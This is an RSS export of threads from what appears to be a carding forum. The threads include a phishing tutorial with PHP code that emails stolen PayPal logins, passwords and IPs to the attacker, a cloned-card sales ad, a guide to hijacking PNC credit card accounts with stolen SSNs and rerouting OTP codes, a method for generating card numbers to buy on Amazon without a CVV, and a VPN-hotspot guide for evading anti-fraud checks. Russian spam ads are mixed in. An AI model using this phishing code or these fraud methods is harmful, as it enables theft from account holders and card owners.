<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[ - Travel]]></title>
		<link>https://cardmine.cc/</link>
		<description><![CDATA[ - https://cardmine.cc]]></description>
		<pubDate>Sun, 10 May 2026 11:45:32 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[HOW TO MAKE SCAMPAGE]]></title>
			<link>https://cardmine.cc/showthread.php?tid=81159</link>
			<pubDate>Thu, 26 Feb 2026 05:21:20 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=179037">RafayBaloch27</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=81159</guid>
			<description><![CDATA[HOW TO MAKE SCAMPAGE by RAFAY BALOCH @DeRafay<br />
<br />
(It's a short tuto, for beginners)<br />
Scam page is a fake webpage. e.g. a login of a popular website, online bank login<br />
and etc. depending on what it is. scam page are used by spammers to collect data on<br />
people who get scammed. detecting scam page is simple if you are technology<br />
oriented. but most common users can't detect scam page. this is a big problem in<br />
the www. some company are developing software to combat scam's or phishing scams -<br />
phishing is the term used<br />
for this scam.<br />
1] OK, so first we choose a target.<br />
We chose <a href="http://www.paypal.com" target="_blank" rel="noopener" class="mycode_url">www.paypal.com</a><br />
2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on<br />
yourcomputer.<br />
3] We open ... There might be a problem, namely the way the image.<br />
4] If relative path (relative path is the path like / images / wow.gif) be<br />
transformed into an absolute path (<a href="http://tinta.com/images/wow.gif" target="_blank" rel="noopener" class="mycode_url">http://tinta.com/images/wow.gif</a>)<br />
5] Now that you clarified your lead you to the file. Html that was saved, so your<br />
login type CTRL + F ... (Here the words are different .. try and password,<br />
password, username, etc.. Dak login does not work).<br />
6] You have a code like &lt;form action="login2.php"&gt;. Login2.php change in<br />
040147.php!<br />
7] Now, the username should be a code like . name = "email" tells us that in PHP<br />
script authentication is the variable that you email username.<br />
8] Good memory.<br />
The password, the code should be similar ( ). So,<br />
password is held in variable password. A and memorize it.<br />
9] Now, where you have saved. Html, created a new file called 040147.php.<br />
In it, add the following code:<br />
Code:<br />
&#36; To = "upgoingstar@gmail.com"<br />
&#36; Name = &#36; _POST ['email'];<br />
&#36; Email = &#36; _POST ['email'];<br />
&#36; Subject = &#36; _POST ['subject'];<br />
&#36; Password = &#36; _POST ['password'];<br />
&#36; Agent = &#36; _SERVER ['HTTP_USER_AGENT'];<br />
&#36; Ip = &#36; _SERVER ['REMOTE_ADDR'];<br />
&#36; D = date ('l dS \ of F Y h: i: s A');<br />
&#36; Sub = "New Account Hacked PayPal - &#36; email";<br />
&#36; Headers = "From: &#36; name &lt;&#36; email&gt; \ n";<br />
&#36; Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";<br />
&#36; Mes .= 'Username:'. &#36; Email. "\ N";<br />
&#36; Msg .= "Password:". &#36; Password. "\ N";<br />
&#36; Msg .= "Browser:". &#36; Agent. "\ N";<br />
&#36; Msg .= "IP:". &#36; Ip. "\ N";<br />
&#36; Mes .= 'Date and time:'. &#36; D;<br />
(<br />
mail (&#36; to, &#36; sub, &#36; mes, &#36; headers);<br />
header ("Location: <a href="http://www.paypal.com" target="_blank" rel="noopener" class="mycode_url">www.paypal.com</a>");<br />
)<br />
?&gt;<br />
10] Modify code<br />
Code:<br />
&#36; To = "Leader@gmail.com"<br />
and put your mail. The code above variables over email and password and sends them<br />
together with some more useful details.<br />
11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and<br />
entertain. : Wink:<br />
YOUR SCAMPAGE IS READY NOW. ENJOY SPAMMING!<br />
<br />
@DeRafay RAFAY BALOCH <br />
<br />
<a href="https://t.me/Rafay_Got_It" target="_blank" rel="noopener" class="mycode_url">https://t.me/Rafay_Got_It</a>]]></description>
			<content:encoded><![CDATA[HOW TO MAKE SCAMPAGE by RAFAY BALOCH @DeRafay<br />
<br />
(It's a short tuto, for beginners)<br />
Scam page is a fake webpage. e.g. a login of a popular website, online bank login<br />
and etc. depending on what it is. scam page are used by spammers to collect data on<br />
people who get scammed. detecting scam page is simple if you are technology<br />
oriented. but most common users can't detect scam page. this is a big problem in<br />
the www. some company are developing software to combat scam's or phishing scams -<br />
phishing is the term used<br />
for this scam.<br />
1] OK, so first we choose a target.<br />
We chose <a href="http://www.paypal.com" target="_blank" rel="noopener" class="mycode_url">www.paypal.com</a><br />
2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on<br />
yourcomputer.<br />
3] We open ... There might be a problem, namely the way the image.<br />
4] If relative path (relative path is the path like / images / wow.gif) be<br />
transformed into an absolute path (<a href="http://tinta.com/images/wow.gif" target="_blank" rel="noopener" class="mycode_url">http://tinta.com/images/wow.gif</a>)<br />
5] Now that you clarified your lead you to the file. Html that was saved, so your<br />
login type CTRL + F ... (Here the words are different .. try and password,<br />
password, username, etc.. Dak login does not work).<br />
6] You have a code like &lt;form action="login2.php"&gt;. Login2.php change in<br />
040147.php!<br />
7] Now, the username should be a code like . name = "email" tells us that in PHP<br />
script authentication is the variable that you email username.<br />
8] Good memory.<br />
The password, the code should be similar ( ). So,<br />
password is held in variable password. A and memorize it.<br />
9] Now, where you have saved. Html, created a new file called 040147.php.<br />
In it, add the following code:<br />
Code:<br />
&#36; To = "upgoingstar@gmail.com"<br />
&#36; Name = &#36; _POST ['email'];<br />
&#36; Email = &#36; _POST ['email'];<br />
&#36; Subject = &#36; _POST ['subject'];<br />
&#36; Password = &#36; _POST ['password'];<br />
&#36; Agent = &#36; _SERVER ['HTTP_USER_AGENT'];<br />
&#36; Ip = &#36; _SERVER ['REMOTE_ADDR'];<br />
&#36; D = date ('l dS \ of F Y h: i: s A');<br />
&#36; Sub = "New Account Hacked PayPal - &#36; email";<br />
&#36; Headers = "From: &#36; name &lt;&#36; email&gt; \ n";<br />
&#36; Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";<br />
&#36; Mes .= 'Username:'. &#36; Email. "\ N";<br />
&#36; Msg .= "Password:". &#36; Password. "\ N";<br />
&#36; Msg .= "Browser:". &#36; Agent. "\ N";<br />
&#36; Msg .= "IP:". &#36; Ip. "\ N";<br />
&#36; Mes .= 'Date and time:'. &#36; D;<br />
(<br />
mail (&#36; to, &#36; sub, &#36; mes, &#36; headers);<br />
header ("Location: <a href="http://www.paypal.com" target="_blank" rel="noopener" class="mycode_url">www.paypal.com</a>");<br />
)<br />
?&gt;<br />
10] Modify code<br />
Code:<br />
&#36; To = "Leader@gmail.com"<br />
and put your mail. The code above variables over email and password and sends them<br />
together with some more useful details.<br />
11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and<br />
entertain. : Wink:<br />
YOUR SCAMPAGE IS READY NOW. ENJOY SPAMMING!<br />
<br />
@DeRafay RAFAY BALOCH <br />
<br />
<a href="https://t.me/Rafay_Got_It" target="_blank" rel="noopener" class="mycode_url">https://t.me/Rafay_Got_It</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Clone cards]]></title>
			<link>https://cardmine.cc/showthread.php?tid=81154</link>
			<pubDate>Mon, 23 Feb 2026 03:21:51 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=244764">Genesis11k</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=81154</guid>
			<description><![CDATA[Get at me for your low &amp; high balance clone cards going for cool price. Clone cards are spammed <br />
Credit cards with clean funds. My clone cards are available for cash out in ATMs?,Gas Station ⛽️ and can be used for online purchase. Our clone cards comes with an ATM pin for easy cash out<br />
<br />
<br />
How does it work ? ? <br />
Spammers use credit card filters to obtain magnetic stripe information of a credit or debit card. The information received is not limited to credit card password,numbers,CVV and expiration date. This information comes in the form of the pin (101 or 201) dumps, now they use the MSR printer to put the received information on a blank card.<br />
<br />
Price <br />
Clone ?orders (balance)<br />
.  &#36;2.2k balance - &#36;150  (price)<br />
.  &#36;3.7k balance - &#36;200 (price)<br />
.  &#36;4.3k balance - &#36;250 (price)<br />
.  &#36;5.5k balance - &#36;300 (price)<br />
.  &#36;6.5k balance - &#36;350 (price)<br />
.  &#36;7.6k balance - &#36;400 (price)<br />
.  &#36;8.5k balance - &#36;450 (price)<br />
.  &#36;9.5k balance - &#36;500 (price)<br />
<br />
Clone ? orders (high balance)<br />
. &#36;10.5k balance - &#36;1k (price)<br />
<br />
. Shipping ? ?<br />
<br />
. Swift Delivery on FedEx <br />
express ?<br />
<br />
???(USA) <br />
???(Canada) <br />
???(UK) <br />
???(Germany) <br />
???(France) <br />
???(Switzerland) <br />
???(Denmark) <br />
???(Netherlands)<br />
???(Spain) <br />
???(Norway)<br />
                    ...and more  <br />
<br />
? I got a %100 money back policy. You can opt-out for a refund when you have problems with our cards ? never had a card returned for a case of not working or errors but your feedback is always needed for us to improve upon our services <br />
<br />
Telegram: @Genesis11k]]></description>
			<content:encoded><![CDATA[Get at me for your low &amp; high balance clone cards going for cool price. Clone cards are spammed <br />
Credit cards with clean funds. My clone cards are available for cash out in ATMs?,Gas Station ⛽️ and can be used for online purchase. Our clone cards comes with an ATM pin for easy cash out<br />
<br />
<br />
How does it work ? ? <br />
Spammers use credit card filters to obtain magnetic stripe information of a credit or debit card. The information received is not limited to credit card password,numbers,CVV and expiration date. This information comes in the form of the pin (101 or 201) dumps, now they use the MSR printer to put the received information on a blank card.<br />
<br />
Price <br />
Clone ?orders (balance)<br />
.  &#36;2.2k balance - &#36;150  (price)<br />
.  &#36;3.7k balance - &#36;200 (price)<br />
.  &#36;4.3k balance - &#36;250 (price)<br />
.  &#36;5.5k balance - &#36;300 (price)<br />
.  &#36;6.5k balance - &#36;350 (price)<br />
.  &#36;7.6k balance - &#36;400 (price)<br />
.  &#36;8.5k balance - &#36;450 (price)<br />
.  &#36;9.5k balance - &#36;500 (price)<br />
<br />
Clone ? orders (high balance)<br />
. &#36;10.5k balance - &#36;1k (price)<br />
<br />
. Shipping ? ?<br />
<br />
. Swift Delivery on FedEx <br />
express ?<br />
<br />
???(USA) <br />
???(Canada) <br />
???(UK) <br />
???(Germany) <br />
???(France) <br />
???(Switzerland) <br />
???(Denmark) <br />
???(Netherlands)<br />
???(Spain) <br />
???(Norway)<br />
                    ...and more  <br />
<br />
? I got a %100 money back policy. You can opt-out for a refund when you have problems with our cards ? never had a card returned for a case of not working or errors but your feedback is always needed for us to improve upon our services <br />
<br />
Telegram: @Genesis11k]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Варианты поиска жилья и работы через сайты объявлений в Казахстане]]></title>
			<link>https://cardmine.cc/showthread.php?tid=81102</link>
			<pubDate>Thu, 12 Feb 2026 13:36:08 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=244546">Brucephego</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=81102</guid>
			<description><![CDATA[Добрый день! <br />
Если вы ищете недвижимость в Усть-Каменогорске, обратите внимание на свежие объявления на доске объявлений OLX. Здесь вы найдете объявления о продаже домов и квартир с фото и подробными описаниями. Бесплатные объявления доступны всем жителям города. Подать объявление можно прямо сейчас, и оно появится в разделе свежие объявления. Объявления Каменогорска помогут вам быстро найти то, что нужно. <br />
Полная информация по ссылке - <a href="https://natumbe.kz/search/nedvizhimost/arenda-nedvizhimosti/arenda-domov/dolgosrochnaya-arenda-domov/?c=330&amp;lt=gallery&amp;page=4" target="_blank" rel="noopener" class="mycode_url">https://natumbe.kz/search/nedvizhimost/a...ery&amp;page=4</a> <br />
объявления павлодар, объявления сергеевка, объявления усть каменогорск kz <br />
олх зыряновск объявления, объявление x, общие объявления <br />
Всего наилучшего и хорошей информации!]]></description>
			<content:encoded><![CDATA[Добрый день! <br />
Если вы ищете недвижимость в Усть-Каменогорске, обратите внимание на свежие объявления на доске объявлений OLX. Здесь вы найдете объявления о продаже домов и квартир с фото и подробными описаниями. Бесплатные объявления доступны всем жителям города. Подать объявление можно прямо сейчас, и оно появится в разделе свежие объявления. Объявления Каменогорска помогут вам быстро найти то, что нужно. <br />
Полная информация по ссылке - <a href="https://natumbe.kz/search/nedvizhimost/arenda-nedvizhimosti/arenda-domov/dolgosrochnaya-arenda-domov/?c=330&amp;lt=gallery&amp;page=4" target="_blank" rel="noopener" class="mycode_url">https://natumbe.kz/search/nedvizhimost/a...ery&amp;page=4</a> <br />
объявления павлодар, объявления сергеевка, объявления усть каменогорск kz <br />
олх зыряновск объявления, объявление x, общие объявления <br />
Всего наилучшего и хорошей информации!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Обзор ресурсов для сделок с недвижимостью и автомобилями в Казахстане]]></title>
			<link>https://cardmine.cc/showthread.php?tid=81100</link>
			<pubDate>Wed, 11 Feb 2026 19:50:28 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=244546">Brucephego</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=81100</guid>
			<description><![CDATA[Привет всем! <br />
На доске объявлений вы найдете множество вариантов для покупки и аренды недвижимости в Кызылорде. Объявления Кызылорды о продаже домов и квартир обновляются регулярно. Свежие объявления с фото и подробными описаниями помогут вам сделать правильный выбор. Бесплатные объявления доступны всем жителям Кызылорды. Подать объявление можно легко и быстро, просто заполнив форму на сайте. <br />
Полная информация по ссылке - <a href="https://natumbe.kz/en/temirtay/elektronika/kompyutery/komplektuyuschie/" target="_blank" rel="noopener" class="mycode_url">https://natumbe.kz/en/temirtay/elektroni...tuyuschie/</a> <br />
объявления шымкент, объявление, объявления кукол <br />
2026 год объявления, объявления усть каменогорск, объявления с ежедневной оплатой <br />
Всего наилучшего и хорошей информации!]]></description>
			<content:encoded><![CDATA[Привет всем! <br />
На доске объявлений вы найдете множество вариантов для покупки и аренды недвижимости в Кызылорде. Объявления Кызылорды о продаже домов и квартир обновляются регулярно. Свежие объявления с фото и подробными описаниями помогут вам сделать правильный выбор. Бесплатные объявления доступны всем жителям Кызылорды. Подать объявление можно легко и быстро, просто заполнив форму на сайте. <br />
Полная информация по ссылке - <a href="https://natumbe.kz/en/temirtay/elektronika/kompyutery/komplektuyuschie/" target="_blank" rel="noopener" class="mycode_url">https://natumbe.kz/en/temirtay/elektroni...tuyuschie/</a> <br />
объявления шымкент, объявление, объявления кукол <br />
2026 год объявления, объявления усть каменогорск, объявления с ежедневной оплатой <br />
Всего наилучшего и хорошей информации!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cashout PNC Business Сredit Сard via Enroll]]></title>
			<link>https://cardmine.cc/showthread.php?tid=80965</link>
			<pubDate>Mon, 22 Dec 2025 11:31:22 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=233684">MartinRay</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=80965</guid>
			<description><![CDATA[In this guide we are going to cash out a PNC Business credit card easily with an Enroll bin. You can clear a study amount of money from this guide so make sure you do not share for it to go out.<br />
<br />
REQUIREMENTS<br />
- PNC Business Credit Bin (Check below)<br />
- Good IP<br />
- Real Phone number<br />
METHOD<br />
Purchase the PNC Business credit CC below from any of your favorite vendors at Trusted Sellers section at <a href="https://styxmarket.news/shop/news/853/styxmarket.com" target="_blank" rel="noopener" class="mycode_url">styxmarket.com</a> .<br />
<br />
Now that you have the card details, find the dob and ssn for the name on the card. Now that you have ssn and dob for the card make a new email for the card.<br />
Now visit the enroll link here: <a href="https://pnc.fdecs.com/eCustService/" target="_blank" rel="noopener" class="mycode_url">https://pnc.fdecs.com/eCustService/</a><br />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/J4t426jw/img17.jpg" loading="lazy"  alt="[Image: img17.jpg]" class="mycode_img" /></div>
<br />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/kXVqcVd9/img24.jpg" loading="lazy"  alt="[Image: img24.jpg]" class="mycode_img" /></div>
<br />
 <br />
At register now, enter card number and the captcha there and submit;<br />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/gc7PnYLf/img25.jpg" loading="lazy"  alt="[Image: img25.jpg]" class="mycode_img" /></div>
<br />
Now enter the card exp, last 4 of ssn and work phone. You can use any of the phone numbers listed on the fullz report<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/FFkhbdvk/img26.jpg" loading="lazy"  alt="[Image: img26.jpg]" class="mycode_img" /></div>
<br />
 <br />
Submit and proceed;<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/CK6VkY68/img30.jpg" loading="lazy"  alt="[Image: img30.jpg]" class="mycode_img" /></div>
<br />
 <br />
Now enter a new password and submit. You can change email, but youcan leave it at the default mailnesia. You can get email access at mailnesia.com after you have created the password. You should now see a success page.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/8PVghZww/img31.jpg" loading="lazy"  alt="[Image: img31.jpg]" class="mycode_img" /></div>
<br />
 <br />
Now login with your username and password and view your account balance;<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/26BgWWWS/img35.jpg" loading="lazy"  alt="[Image: img35.jpg]" class="mycode_img" /></div>
<br />
 <br />
Now that we have access to the online account for the business credit card let’s look at phone number. At the moment you can charge sites which do not require otp to ship like amazon. Mostly thank you shipping sites and do well to ship items in the same state as the card you are using. The main issue now is, not all sites will allow you to hit without otp. You can choose to be shipping items but the fastest way to clear this card is via apple pay or any remittance out there and they all require otp.<br />
 <br />
This means, we have to change the phone number. You can easily do that online or call, but after changing the account will be locked. What you have to do now is; first list your phone number on the fullz credit report. This has to be a real phone number, then you will wait for the number to fully enter every bureau which should take about 5-6 days. To make it more ideal you can leave it for 7days which would be a week.<br />
 <br />
Now call pnc on this real phone number (eSim same area code recommended) and ask them to change your work phone number for you. When they ask, let them have the phone number you are calling from which is already listed on report. They will send code to verify and if you get that code, you are good to go. Now, after changing work phone number, wait 1-2 business days and check your account status. It should be still standing, now you can charge apple pay and any other site that will ask otp. Any time you see otp, just select work phone number and send otp o it and you are good to go.<br />
You can clear all the money!!! Happy cashing out<br />
BIN - 443603]]></description>
			<content:encoded><![CDATA[In this guide we are going to cash out a PNC Business credit card easily with an Enroll bin. You can clear a study amount of money from this guide so make sure you do not share for it to go out.<br />
<br />
REQUIREMENTS<br />
- PNC Business Credit Bin (Check below)<br />
- Good IP<br />
- Real Phone number<br />
METHOD<br />
Purchase the PNC Business credit CC below from any of your favorite vendors at Trusted Sellers section at <a href="https://styxmarket.news/shop/news/853/styxmarket.com" target="_blank" rel="noopener" class="mycode_url">styxmarket.com</a> .<br />
<br />
Now that you have the card details, find the dob and ssn for the name on the card. Now that you have ssn and dob for the card make a new email for the card.<br />
Now visit the enroll link here: <a href="https://pnc.fdecs.com/eCustService/" target="_blank" rel="noopener" class="mycode_url">https://pnc.fdecs.com/eCustService/</a><br />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/J4t426jw/img17.jpg" loading="lazy"  alt="[Image: img17.jpg]" class="mycode_img" /></div>
<br />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/kXVqcVd9/img24.jpg" loading="lazy"  alt="[Image: img24.jpg]" class="mycode_img" /></div>
<br />
 <br />
At register now, enter card number and the captcha there and submit;<br />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/gc7PnYLf/img25.jpg" loading="lazy"  alt="[Image: img25.jpg]" class="mycode_img" /></div>
<br />
Now enter the card exp, last 4 of ssn and work phone. You can use any of the phone numbers listed on the fullz report<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/FFkhbdvk/img26.jpg" loading="lazy"  alt="[Image: img26.jpg]" class="mycode_img" /></div>
<br />
 <br />
Submit and proceed;<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/CK6VkY68/img30.jpg" loading="lazy"  alt="[Image: img30.jpg]" class="mycode_img" /></div>
<br />
 <br />
Now enter a new password and submit. You can change email, but youcan leave it at the default mailnesia. You can get email access at mailnesia.com after you have created the password. You should now see a success page.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/8PVghZww/img31.jpg" loading="lazy"  alt="[Image: img31.jpg]" class="mycode_img" /></div>
<br />
 <br />
Now login with your username and password and view your account balance;<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/26BgWWWS/img35.jpg" loading="lazy"  alt="[Image: img35.jpg]" class="mycode_img" /></div>
<br />
 <br />
Now that we have access to the online account for the business credit card let’s look at phone number. At the moment you can charge sites which do not require otp to ship like amazon. Mostly thank you shipping sites and do well to ship items in the same state as the card you are using. The main issue now is, not all sites will allow you to hit without otp. You can choose to be shipping items but the fastest way to clear this card is via apple pay or any remittance out there and they all require otp.<br />
 <br />
This means, we have to change the phone number. You can easily do that online or call, but after changing the account will be locked. What you have to do now is; first list your phone number on the fullz credit report. This has to be a real phone number, then you will wait for the number to fully enter every bureau which should take about 5-6 days. To make it more ideal you can leave it for 7days which would be a week.<br />
 <br />
Now call pnc on this real phone number (eSim same area code recommended) and ask them to change your work phone number for you. When they ask, let them have the phone number you are calling from which is already listed on report. They will send code to verify and if you get that code, you are good to go. Now, after changing work phone number, wait 1-2 business days and check your account status. It should be still standing, now you can charge apple pay and any other site that will ask otp. Any time you see otp, just select work phone number and send otp o it and you are good to go.<br />
You can clear all the money!!! Happy cashing out<br />
BIN - 443603]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Generating CC without CVV for Amazon]]></title>
			<link>https://cardmine.cc/showthread.php?tid=80964</link>
			<pubDate>Mon, 22 Dec 2025 10:02:01 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=233684">MartinRay</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=80964</guid>
			<description><![CDATA[In general, I think everyone knows that amazon carton without ssvv, sometimes true svvv asks but it is very easy to get around. In short, we will generate valid cards without svvs and make money actually out of thin air. And so we all know that the bin consists of 6 digits, but this info is a bit outdated, in fact, the bin can consist of 9-10 numbers, to generate the moon has all 6-5 numbers. Krc guys, looking for cards from mixed states (since there is no AVS and they enter the Amazon with minimal frost), find the types of cards in which the default exp the same (such not a few), that is, all cards of a certain bank and a certain type may be the default exp, for example in my case is 01/27. And as I said above, I noticed that all cards of the bank and the type of this bin stretches as much as 10 digits. Get these 9-10 numbers in the card generator <a href="https://bincheck.io/ru/credit-card-generator" target="_blank" rel="noopener" class="mycode_url">https://bincheck.io/ru/credit-card-generator</a>, make a full 16 digits of the card, then along with the default for the bin exp checker without CVV such as luxchecker.vc<br />
 <br />
I checked 33 genres and got 9 valid cards with code 00 Approv<br />
The first card went right into the &#36;300+ amaz, entered the note.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/Y9FHwKMS/1.png" loading="lazy"  alt="[Image: 1.png]" class="mycode_img" /></div>
<br />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/L62MGbWQ/2.png" loading="lazy"  alt="[Image: 2.png]" class="mycode_img" /></div>
<br />
 <br />
For those who keep their own checkers in general theme of gold. You can brute force cards and make money out of thin air.<br />
I hope you were useful to know such an unusual topic! Do not be stingy with the reactions, friends! In lps do not write, I found the bins are not given))) Look for yourself in shops, there are a lot of choices for maps and can find bins with default for all cards exp, buy a couple of cards to know the remaining 3-4 digits of the board and generate maps to shit.<br />
Look for high level card bins at once, the card that came in the screenshot level CREDIT WORLD. There is no sense to brute force in such a way debits and all sorts of preps, the earnings will be minimal. Here krch the main thing is to get asshole and find among hundreds of thousands of cards bins which everywhere the same exp, well, and the bin itself, the longer the bin the more likely to generate a really lively map. That's all. The author of the manual is a forum user with the nickname Glenn.]]></description>
			<content:encoded><![CDATA[In general, I think everyone knows that amazon carton without ssvv, sometimes true svvv asks but it is very easy to get around. In short, we will generate valid cards without svvs and make money actually out of thin air. And so we all know that the bin consists of 6 digits, but this info is a bit outdated, in fact, the bin can consist of 9-10 numbers, to generate the moon has all 6-5 numbers. Krc guys, looking for cards from mixed states (since there is no AVS and they enter the Amazon with minimal frost), find the types of cards in which the default exp the same (such not a few), that is, all cards of a certain bank and a certain type may be the default exp, for example in my case is 01/27. And as I said above, I noticed that all cards of the bank and the type of this bin stretches as much as 10 digits. Get these 9-10 numbers in the card generator <a href="https://bincheck.io/ru/credit-card-generator" target="_blank" rel="noopener" class="mycode_url">https://bincheck.io/ru/credit-card-generator</a>, make a full 16 digits of the card, then along with the default for the bin exp checker without CVV such as luxchecker.vc<br />
 <br />
I checked 33 genres and got 9 valid cards with code 00 Approv<br />
The first card went right into the &#36;300+ amaz, entered the note.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/Y9FHwKMS/1.png" loading="lazy"  alt="[Image: 1.png]" class="mycode_img" /></div>
<br />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/L62MGbWQ/2.png" loading="lazy"  alt="[Image: 2.png]" class="mycode_img" /></div>
<br />
 <br />
For those who keep their own checkers in general theme of gold. You can brute force cards and make money out of thin air.<br />
I hope you were useful to know such an unusual topic! Do not be stingy with the reactions, friends! In lps do not write, I found the bins are not given))) Look for yourself in shops, there are a lot of choices for maps and can find bins with default for all cards exp, buy a couple of cards to know the remaining 3-4 digits of the board and generate maps to shit.<br />
Look for high level card bins at once, the card that came in the screenshot level CREDIT WORLD. There is no sense to brute force in such a way debits and all sorts of preps, the earnings will be minimal. Here krch the main thing is to get asshole and find among hundreds of thousands of cards bins which everywhere the same exp, well, and the bin itself, the longer the bin the more likely to generate a really lively map. That's all. The author of the manual is a forum user with the nickname Glenn.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Share WiFi with OVPN config from Windows]]></title>
			<link>https://cardmine.cc/showthread.php?tid=80963</link>
			<pubDate>Sun, 21 Dec 2025 20:03:24 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=233684">MartinRay</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=80963</guid>
			<description><![CDATA[In this episode I will tell you how to distribute OVPN from the computer.<br />
This is a useful feature to get rid of the VPN tag on Apple, when registering offices, banks - they see it well and it directly affects the forfeit points.It has nothing to do with GPS - your location will match the real one.<br />
 <br />
Cons:<br />
There are configurations that cannot be changed, and in the case of a strong anti-fraud service, it can identify you as a multi-acc.<br />
Pros:<br />
Many configurations such as WiFi Mac Address, SSID, and other useful configurations can be changed.<br />
Eliminate VPN tag on apples, don't use third party services to spoof IP on phones, tablets, computers.<br />
 <br />
Enable Hotspot / Hotspot. On different versions of Windows, the words and terms may be different, but the essence is the same.<br />
 <br />
Windows 7-10<br />
Control Panel -&gt; Network and Sharing Center -&gt; set up a new connection -&gt; set up a wireless computer-to-computer network.<br />
Windows 11<br />
In the search, write mobile hotspot , turn it on.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/K8kHR73h/1.png" loading="lazy"  alt="[Image: 1.png]" class="mycode_img" /></div>
<br />
 Installation is simple and requires no explanation.<br />
Confirm the installation of the software for full OpenVpn operation. This is the TAP driver that will redirect our traffic from the config to the access point. Click Install<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/sD8ndBHR/2.png" loading="lazy"  alt="[Image: 2.png]" class="mycode_img" /></div>
<br />
TAP driver<br />
3. Check the adapters and their settings.<br />
Fly Control Panel -&gt; Network and Sharing Center -&gt; Change adapter settings, or search for "Network Connections".<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/tJczjf5N/3.png" loading="lazy"  alt="[Image: 3.png]" class="mycode_img" /></div>
<br />
Adapters<br />
Note immediately the presence of Adapters:<br />
Tap-Windows Adapter - This is our OpenVpn (roughly speaking).<br />
Microsoft Wi-Fi Direct Virtual - Our access point, may be called differently, but you will understand what it is after you turn the access point on/off. It will disappear and appear.<br />
Check the hotspot - click on the adapter -&gt; properties -&gt; access , synchronize with my data, if it stands otherwise.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/T1BnSbdF/4.png" loading="lazy"  alt="[Image: 4.png]" class="mycode_img" /></div>
Correct setup of the hotspot adapter.<br />
If you have problems, disable the driver, and restart it in the Device Manager -&gt; Network Adapters. Then repeat the circle<br />
Check TAP - click on the adapter -&gt; properties -&gt; access.<br />
Tick all options + from the list of connections select our Hot Spot<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/G25D8DyD/5.png" loading="lazy"  alt="[Image: 5.png]" class="mycode_img" /></div>
Run the OpenVPN config and turn on the access point (hotspot).<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/5Nc3scXx/6.png" loading="lazy"  alt="[Image: 6.png]" class="mycode_img" /></div>
4. Check the IP of the phone.<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.postimg.cc/X70fwwPd/7.jpg" loading="lazy"  alt="[Image: 7.jpg]" class="mycode_img" /></div>
<br />
IP on the phone<br />
I want to clarify that the IP address (rough location) you will be synchronized to the configuration. But your Location, will be your real one. And the mismatch of these indicators is the strongest fraud for the application.<br />
Good luck with your registrations.<br />
This configuration had to be done once, the following times you will have automatic WiFi sharing from config if OpenVPN is running]]></description>
			<content:encoded><![CDATA[In this episode I will tell you how to distribute OVPN from the computer.<br />
